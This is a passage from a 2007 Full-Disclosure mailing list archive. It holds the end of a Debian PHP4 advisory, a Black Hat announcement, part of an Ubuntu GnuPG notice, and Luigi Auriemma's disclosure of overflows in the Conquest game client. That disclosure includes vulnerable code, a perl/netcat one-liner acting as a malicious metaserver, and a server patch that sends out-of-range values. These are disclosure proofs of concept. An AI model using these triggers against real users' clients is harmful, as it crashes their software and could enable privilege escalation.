http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_ia64.deb Size/MD5 checksum: 48280 cea938e0b3829eeb344939c6116a3274 http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_ia64.deb Size/MD5 checksum: 27042 fc2b4d3e1ae91076548568d8c922037f http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_ia64.deb Size/MD5 checksum: 22658 f0f5301aa72e4e4ad61bdf90e6594de2 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_ia64.deb Size/MD5 checksum: 9334 a5c9f81e2bd6bc5ee4c86f5e4d1a0cd1 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_ia64.deb Size/MD5 checksum: 27602 89ecb1e38d742cff328580cdfe78b8f1 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_ia64.deb Size/MD5 checksum: 36192 49054c542a4534c12894bfefaf0db1eb http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_ia64.deb Size/MD5 checksum: 9012 d4db9ef8429729ab3051501004082c99 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_ia64.deb Size/MD5 checksum: 16338 d614825738a19af8ad2500b7c048b51b http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_ia64.deb Size/MD5 checksum: 28878 6d5df675a23f641f3e1dc5656db9e18a http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_ia64.deb Size/MD5 checksum: 21912 e76f15111a9b4ccdd94e1f7eac74b088 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_m68k.deb Size/MD5 checksum: 1580014 f45532aa9784f98ff1525bb005c76b30 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_m68k.deb Size/MD5 checksum: 1578768 71e652061d4867e6520d448b695f59f7 http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_m68k.deb Size/MD5 checksum: 3080886 6131fe6ae47c2585775714cc64f2b34e http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_m68k.deb Size/MD5 checksum: 1551076 4aef3676854e4ace8e79d0b740109acd http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_m68k.deb Size/MD5 checksum: 168268 46923171263033b7d10a73c165baa849 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_m68k.deb Size/MD5 checksum: 18322 38c451535b6cd68a0e685c4df93cb01e http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_m68k.deb Size/MD5 checksum: 325808 dd492a00a1d27fa02f2b60e6a481d753 http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_m68k.deb Size/MD5 checksum: 36516 d96b45bb5edaf8edd2282180639ddde8 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_m68k.deb Size/MD5 checksum: 31006 5647045aff47fb945f5ad2f148e4aede http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_m68k.deb Size/MD5 checksum: 34926 a7fecf002a308ed790931ecc849f379c http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_m68k.deb Size/MD5 checksum: 19126 8cd11ec89d611be7674b5117bd48545a http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_m68k.deb Size/MD5 checksum: 17820 d4e6de681e37bae511f04d4a3aa5bb2f http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_m68k.deb Size/MD5 checksum: 7964 06ac2494cd27c91d06f40592bdde7871 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_m68k.deb Size/MD5 checksum: 20694 b290e22f889af582bedf953d3b5e63a2 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_m68k.deb Size/MD5 checksum: 25852 be18d00b30fbca8ee6f6d9f31c9912b4 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_m68k.deb Size/MD5 checksum: 7682 7fd30edd98afff26bb2d0fedc5556ac8 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_m68k.deb Size/MD5 checksum: 12708 f95ada3a476fda3ea9bb36a263dfc19e http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_m68k.deb Size/MD5 checksum: 20376 6a0f683bd56800a86976d17cf0f90438 http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_m68k.deb Size/MD5 checksum: 15878 4d8a9a99d92b68a7c29f9e4eb48e6c28 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_mips.deb Size/MD5 checksum: 1648626 c09ff318909ac3ec198cf8adb32c3e73 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_mips.deb Size/MD5 checksum: 1646678 8adf0e0321dad42a4a33278b54c1d78a http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_mips.deb Size/MD5 checksum: 3295802 61b55383a87aaecf5825679502a2cd94 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_mips.deb Size/MD5 checksum: 1652658 c094e3ff43dca52eecd39d3d393003f9 http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_mips.deb Size/MD5 checksum: 168214 a85518eecd34caeb8b155741fbba6db2 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_mips.deb Size/MD5 checksum: 16826 79bb3b43b38eba4b9cfaed68939fb1ad http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_mips.deb Size/MD5 checksum: 325308 eab0cd699328a69b4f3ef88481985d6c http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_mips.deb Size/MD5 checksum: 35228 de389e3122cd99882eeeaca2fc7b70a3 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_mips.deb Size/MD5 checksum: 31938 87dea075793ed76b812a81963c913aef http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_mips.deb Size/MD5 checksum: 34012 e535078c682091dac1a46f2fb4c0e7c4 http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_mips.deb Size/MD5 checksum: 19922 5fe0bc6ac5386626273ae6ee2e66215b http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_mips.deb Size/MD5 checksum: 16476 372a59ba3934e84bb106896a06a03a11 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_mips.deb Size/MD5 checksum: 8120 2b6f78e9419969fdc3ce80bc14d85560 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_mips.deb Size/MD5 checksum: 20504 0ce56458633d1e77f528d4f9b968ce13 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_mips.deb Size/MD5 checksum: 26370 3b393309a1ddb3a67a6018496ca29e6b http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_mips.deb Size/MD5 checksum: 7824 fa7930366a56bb94deaffe6440e94822 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_mips.deb Size/MD5 checksum: 13154 243bf42c3fdd1db4f402de11750c9171 http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_mips.deb Size/MD5 checksum: 21654 cd359bf978b6ea51e6eb65a37b60278f http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_mips.deb Size/MD5 checksum: 16188 d4ebc66b677efe3b82a163b62c29aa35 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_mipsel.deb Size/MD5 checksum: 1630640 210a7f2df10febfaa52f2447520df140 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_mipsel.deb Size/MD5 checksum: 1628878 17b584a9e468eb8ede205a2a6878f4b1 http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_mipsel.deb Size/MD5 checksum: 3254494 b9a460244d857a77f0d2fc5c1b91894f http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_mipsel.deb Size/MD5 checksum: 1631616 370c7e8cb963ec8f95049dbf5675fe4a http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_mipsel.deb Size/MD5 checksum: 168228 ff3e221bfb5b79f12c10ebd815d88b29 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_mipsel.deb Size/MD5 checksum: 16794 7d960cc9d3e3d362d0f4dba0497eb5b7 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_mipsel.deb Size/MD5 checksum: 325308 f14f5986aa26436d2c6d81707b9987d8 http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_mipsel.deb Size/MD5 checksum: 34774 f4f195f0914c0bc882b5143c479c5d24 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_mipsel.deb Size/MD5 checksum: 31666 9f6063fcb54d5379b997ccbc982f65f2 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_mipsel.deb Size/MD5 checksum: 33894 da46922024a02d1023b521cc076cb9cb http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_mipsel.deb Size/MD5 checksum: 19800 b86f23fe9c0c7ec4b56c2f767693835f http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_mipsel.deb Size/MD5 checksum: 16384 3e98c62e74e0523e224ad665e604eb78 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_mipsel.deb Size/MD5 checksum: 8092 2ab07f4176f45cbd6a74fbccdb72e9b9 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_mipsel.deb Size/MD5 checksum: 20448 61b72f3ff7cbdec0c7bcf644ae7a42e4 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_mipsel.deb Size/MD5 checksum: 26244 d38dfaa8d7a2565b38edf485c9692212 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_mipsel.deb Size/MD5 checksum: 7778 0aba913f072a2ab411f7f36408838041 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_mipsel.deb Size/MD5 checksum: 13054 2b4f2d929c4a9e8d7aafc439b6a6b4b4 http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_mipsel.deb Size/MD5 checksum: 21598 6691aed3e3879ce3884c31bc0c60ae4f http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_mipsel.deb Size/MD5 checksum: 16166 696aa9954b611596fa02b92bb15914d3 PowerPC architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_powerpc.deb Size/MD5 checksum: 1661280 abad22f7719712b40a4af68503551e21 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_powerpc.deb Size/MD5 checksum: 1659466 4997003d5edddb161c931ed7f47cfe0a http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_powerpc.deb Size/MD5 checksum: 3281422 f4bdbbaac2e032788c26bb92dc0da376 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_powerpc.deb Size/MD5 checksum: 1646784 d84ff6b16873412f6af326995e09ab54 http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_powerpc.deb Size/MD5 checksum: 168220 3f03b4edeffcd89c5cc4127d3a4602ac http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_powerpc.deb Size/MD5 checksum: 19638 1c874990ecb283c1b23950b016485b50 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_powerpc.deb Size/MD5 checksum: 325264 15b8a3d2cde40c4aaf31d1925189ab3b http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_powerpc.deb Size/MD5 checksum: 38646 3945c96a6cd13120e293f60ae820d6d0 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_powerpc.deb Size/MD5 checksum: 34516 b44d4867447c01db49fe5a9c8e538015 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_powerpc.deb Size/MD5 checksum: 37770 8fffcc151a281269cccb29559f0b90fc http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_powerpc.deb Size/MD5 checksum: 21412 9a9663537ca1997bc62cfa4494eba8f3 http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_powerpc.deb Size/MD5 checksum: 19728 9bb25b04bec25cee082c8a8e81c4a19d http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_powerpc.deb Size/MD5 checksum: 9578 d1bd238a89be2838f5b37d5b2b2a9053 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_powerpc.deb Size/MD5 checksum: 22604 2935a012ecd74195f44e2213c9999c7a http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_powerpc.deb Size/MD5 checksum: 28686 46bb5b9d2b6e4258fe2b8dc130ae817c http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_powerpc.deb Size/MD5 checksum: 9286 2282aefc94808ac2ea1490ecb3ea357f http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_powerpc.deb Size/MD5 checksum: 14960 68716f24414748d9e621c7f4b0a8e2ea http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_powerpc.deb Size/MD5 checksum: 23038 193ae7cc97bc2ce1c7033cc14cd6c9c9 http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_powerpc.deb Size/MD5 checksum: 18268 1b032bee509fb88ce36d481c4335418a IBM S/390 architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_s390.deb Size/MD5 checksum: 1709576 c521d1761395fa41e785906cd052a240 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_s390.deb Size/MD5 checksum: 1708618 cbea3ff2f1f8b42c91f8d1ebe6f295a1 http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_s390.deb Size/MD5 checksum: 3360294 a642ef581d1decdd6b330f2ca62aa3a8 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_s390.deb Size/MD5 checksum: 1687438 0a16abfb5e945795b598e06fe78821bd http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_s390.deb Size/MD5 checksum: 168202 088f381bf8f67c76e6a636b1a7420709 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_s390.deb Size/MD5 checksum: 17842 6f628c4ba64fe7c3e6d1958d8887a032 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_s390.deb Size/MD5 checksum: 325188 84155d21cc204dd029cb6fe724fd700e http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_s390.deb Size/MD5 checksum: 41124 f159880550b5c238b0f9cd357763e120 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_s390.deb Size/MD5 checksum: 33564 560a9717ec712e71a9608ee808017f93 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_s390.deb Size/MD5 checksum: 37530 58332a689abe020d696accb2c4413bdc http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_s390.deb Size/MD5 checksum: 21410 8266344d677b30c00ee0575185808c7d http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_s390.deb Size/MD5 checksum: 17732 1d5a9cdcc554b886836392abacafb37a http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_s390.deb Size/MD5 checksum: 8394 bf5bfd48a6955ed04cf5eb43c0dbed80 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_s390.deb Size/MD5 checksum: 22938 558f6a81404ef0097f4d47ef41067acd http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_s390.deb Size/MD5 checksum: 28874 63b1580d76b438dfe3c6150fca0c983c http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_s390.deb Size/MD5 checksum: 8048 fb1993cc4170134b46d0a68496971992 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_s390.deb Size/MD5 checksum: 13894 eeee528a1872d8fd80f92c6459950216 http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_s390.deb Size/MD5 checksum: 22276 ef4cc0b299f757599e7edd178cfbfa95 http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_s390.deb Size/MD5 checksum: 17300 c2d98a377eff47a1fa6376d491378007 Sun Sparc architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_sparc.deb Size/MD5 checksum: 1623810 c451cd4693f5a69534681b1eba46e29d http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_sparc.deb Size/MD5 checksum: 1620886 6f450acb1570c2917c92af4e2ee3462b http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_sparc.deb Size/MD5 checksum: 3197912 c01cbc381a760f7439f8c8b24a8ee717 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_sparc.deb Size/MD5 checksum: 1606454 0f3be5c22bb512308e0c668b06e7f25b http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_sparc.deb Size/MD5 checksum: 168222 d4a0310401f3092a2ea57880bed9911d http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_sparc.deb Size/MD5 checksum: 18074 160821e02197baf3364906d17eabaa37 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_sparc.deb Size/MD5 checksum: 325276 b0c1759a579859033b410d34bf443162 http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_sparc.deb Size/MD5 checksum: 36488 cb0f7a642bcc12fdcde900b179ad197f http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_sparc.deb Size/MD5 checksum: 31948 c31211a42a127e283cf05eea2acb3782 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_sparc.deb Size/MD5 checksum: 36246 ded59dffa2579d4f3f91be5bc465812e http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_sparc.deb Size/MD5 checksum: 19278 d852fc1b8146be87d789d46f3fd9531a http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_sparc.deb Size/MD5 checksum: 17488 c25a9f3959ad71717f22139ee5cc3964 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_sparc.deb Size/MD5 checksum: 7870 54ef2d007c15936eff7a0968c1bb8411 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_sparc.deb Size/MD5 checksum: 20672 3aa6f646c2d48e12f274844d882b4cb3 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_sparc.deb Size/MD5 checksum: 26540 db50bace36223a5fb3165012da864279 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_sparc.deb Size/MD5 checksum: 7594 a16c41b7273adaf2b72e2cd66a29d856 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_sparc.deb Size/MD5 checksum: 12846 5f44cba16d1c910b0336c221ab3db31b http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_sparc.deb Size/MD5 checksum: 20850 f84c554b5e0c31a276444953acdf0d5d http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_sparc.deb Size/MD5 checksum: 15866 56d9a2ad4d2d94150b7be7deefc6fbd0 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF7zanXm3vHE4uyloRAr0xAKCLwQ7ji6kxWczRj+WZRIEknn3R4QCgxaVz ShT4FvG6b6xvbngTqwEvkkU= =FElM -----END PGP SIGNATURE----- From aluigi at autistici.org Wed Mar 7 23:40:10 2007 From: aluigi at autistici.org (Luigi Auriemma) Date: Thu, 8 Mar 2007 00:40:10 +0100 Subject: [Full-disclosure] Buffer-overflow in Conquest client 8.2a (svn 691) Message-ID: <20070308004010.60ed5b37.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: Conquest http://www.radscan.com/conquest.html Versions: <= 8.2a (svn 691) Platforms: *nix and Windows Bugs: A] buffer-overflow in metaGetServerList() B] memory corruption through SP_CLIENTSTAT Exploitation: local and remote, versus the client Date: 07 Mar 2007 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Conquest is a multi-player game which can be defined the predecessor of Netrek (http://www.netrek.org). Note that on some distros (like Debian) the conquest's binaries are marked setgid for the conquest group. ####################################################################### ======= 2) Bugs ======= ----------------------------------------- A] buffer-overflow in metaGetServerList() ----------------------------------------- The Conquest client has an option (-m) for the querying of the metaserver conquest.radscan.com on which are listed the servers currently online but the program allows the usage of alternative metaservers too. The function which reads the data received from the metaserver is affected by a stack based buffer-overflow which happens during the storing of the line containing the server's entry in a buffer (buf) of 1024 bytes. The best exploitation of this bug is for local users who want to escalate their privileges gaining the conquest group. At the same time exists also another buffer-overflow which affects the static servers buffer limited to 1000 (META_MAXSERVERS) max servers, anyway doesn't seem possible to fully exploit this second bug for code execution. from meta.c: int metaGetServerList(char *remotehost, metaSRec_t **srvlist) { static metaSRec_t servers[META_MAXSERVERS]; ... char buf[1024]; /* server buffer */ ... off = 0; while (read(s, &c, 1) > 0) { if (c != '\n') { buf[off++] = c; } else { /* we got one */ buf[off] = 0; /* convert to a metaSRec_t */ if (str2srec(&servers[nums], buf)) nums++; ... ------------------------------------------ B] memory corruption through SP_CLIENTSTAT ------------------------------------------ SP_CLIENTSTAT is a type of packet used by the server for sending some informations about the ships and the users. In this packet are located two numbers which are not correctly sanitized by the client: - unum: 16 bit, used for the Users structure - snum: 8 bit, used for the Ships structure Both the structures are placed in the cBasePtr buffer allocated at runtime with 262144 (SIZEOF_COMMONBLOCK) bytes of memory: Users at offset 388 where each element has a size of 264 bytes (total 132000) and Ships at offset 141040 with 1124 bytes per element (total 23604). In both the cases is possible to write one or more bytes in some zones of the memory outside the original structures and the cBasePtr buffer, but I think that code execution is practically impossible... The following are the instructions used for handling the SP_CLIENTSTAT packet and where is easily visible the writing of the scstat->team value sent by the server: case SP_CLIENTSTAT: scstat = (spClientStat_t *)buf; Context.snum = scstat->snum; Context.unum = (int)ntohs(scstat->unum); Ships[Context.snum].team = scstat->team; clientFlags = scstat->flags; break; ####################################################################### =========== 3) The Code =========== A] - launch a fake metaserver which sends more than 1024 chars: perl -e 'print "a"x1200' | nc -l -p 1700 -v -v -n - launch the client specifying the alternate metaserver: conquest -m -M 127.0.0.1 - interrupt the fake metaserver, conquest should have been crashed trying to executing the code at offset 0x61616161 B] - get the source code of the server, modify the scstat.snum or scstat.unum value in the sendClientStat function located in server.c giving them values like 0xff (for snum) or htons(0xffff) (for unum) depending by what of the two bugs you want to test: scstat.type = SP_CLIENTSTAT; scstat.flags = flags; - scstat.snum = snum; + scstat.snum = 0xff; scstat.team = team; scstat.unum = htons(unum); scstat.esystem = esystem; - compile the new server, launch it and join with a client which will crash after the login ####################################################################### ====== 4) Fix ====== SVN 693 ####################################################################### --- Luigi Auriemma http://aluigi.org http://mirror.aluigi.org From jmoss at blackhat.com Thu Mar 8 03:24:17 2007 From: jmoss at blackhat.com (Jeff Moss) Date: Wed, 07 Mar 2007 19:24:17 -0800 Subject: [Full-disclosure] Black Hat USA CFP Now Open! Message-ID: <200703080327.l283RYEo011051@colossus.datamerica.com> Full Disclosure readers, I wanted to make some quick Black Hat related announcements. The Call For Papers for Black Hat USA is now open. This is the main event, and this year we have even more space, we have expanded from 9 tracks to 11, and we will be introducing Break Out sessions and the Deep Knowledge track will now span both days. We are working to expand the depth and breath of content, so if you have something up your sleeve you want to present, check out the CFP: http://www.blackhat.com/html/bh-usa-07/bh-usa-07-cfp.html Black Hat USA 2007 Training Classes now open. Please see the following link for a complete list of classes being offered this year. http://www.blackhat.com/html/bh-usa-07/train-bh-usa-07-index.html Highlights include over 35 training classes including two new four day sessions. Below is a sample of what to expect: - The nuts and bolts of the Metasploit Framework: Metasploit 3.0 Internals by Matt Miller, aka skape. - Web Application (In)security by NGS Software. If you are concerned with the security of web applications and the insecurity they introduce to your back end information systems this is the workshop for you. - TCP/IP Weapons School: Black Hat Edition by Richard Bejtlich, TaoSecurity. Learn how networks can be abused and subverted, while analyzing the attacks, methods, and traffic that make it happen. - Ultimate Hacking: Wireless Edition by Foundstone. Knowledge is power and you do not want the hackers to know more about your wireless networks than you do. - Hands-On Hardware Hacking and Reverse Engineering Techniques: Black Hat Edition by Joe Grand. This course is the first of its kind and focuses entirely on hardware hacking. - ROOTKIT: Advanced 2nd Generation Digital Weaponry by Greg Hoglund and Jamie Butler. Advanced class developed and taught by the creators of rootkit.com - Advanced Malware Deobfuscation by Jason Geffner & Scott Lambert. No Source? No Symbols? No Problem. - Hacking by Numbers: Combat Grading by SensePost. Advanced level. The world?s first objective technical grading system for hackers and penetration testers. Black Hat Briefings and Trainings USA 2007: http://www.blackhat.com/html/bh-usa-07/bh-usa-07-index.html Registration on-line at: http://www.blackhat.com/html/bh-registration/bh-registration.html#USA Hotel Reservations now open. http://www.blackhat.com/html/bh-usa-07/bh-usa-07-venue.html RSS: http://www.blackhat.com/BlackHatRSS.xml Black Hat Europe: Black Hat Europe 2007 Hotel rate extended. We have extended the Group Rate at the Movenpick in Amsterdam until the end of this week (March 9). If you plan to stay at the hotel, now is the last minute for you reserve at the Black Hat conference rate, currently EUR 145,00 per night plus taxes. http://www.blackhat.com/html/bh-europe-07/bh-eu-07-venue.html Thank you, Jeff Moss From kees at ubuntu.com Thu Mar 8 07:04:49 2007 From: kees at ubuntu.com (Kees Cook) Date: Wed, 7 Mar 2007 23:04:49 -0800 Subject: [Full-disclosure] [USN-432-1] GnuPG vulnerability Message-ID: <20070308070449.GF20498@outflux.net> =========================================================== Ubuntu Security Notice USN-432-1 March 08, 2007 gnupg vulnerability CVE-2007-1263 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: gnupg 1.4.1-1ubuntu1.7 Ubuntu 6.06 LTS: gnupg 1.4.2.2-1ubuntu2.5 Ubuntu 6.10: gnupg 1.4.3-2ubuntu3.3 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Gerardo Richarte from Core Security Technologies discovered that when gnupg is used without --status-fd, there is no way to distinguish initial unsigned messages from a following signed message. An attacker could inject an unsigned message, which could fool the user into thinking the message was entirely signed by the original sender. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.7.diff.gz Size/MD5: 25425 95c70d62c7e93b0a294250f1ef8bffbc http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.7.dsc Size/MD5: 684 80528a24f59f9dc0063a6640d49d2879 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1.orig.tar.gz Size/MD5: 4059170 1cc77c6943baaa711222e954bbd785e5 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.7_amd64.deb Size/MD5: 1136974 ab221f5e755ffcb88f9db8be00d2b78c http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.7_amd64.udeb Size/MD5: 152330 4babe71c8a3f93bcc1169dfc60e47b89 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.7_i386.deb Size/MD5: 1045290 eeb54cf2e3b201b2c813507b537dae81 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.7_i386.udeb Size/MD5: 130812 86c1ee88f32bf5e4a35144d22e42024b powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.7_powerpc.deb Size/MD5: 1120350 8c0a11b1b29093e2a6fc198d93bee8f0 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.7_powerpc.udeb Size/MD5: 140330 8bf6e199e1ed859d65f015f8f5a6fe05 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.7_sparc.deb Size/MD5: 1065120 25a911b1644da3be8880221f002f8563 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.7_sparc.udeb Size/MD5: 139740 80e9a3c9748f918745c5417ea64ce06a Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.5.diff.gz Size/MD5: 24318 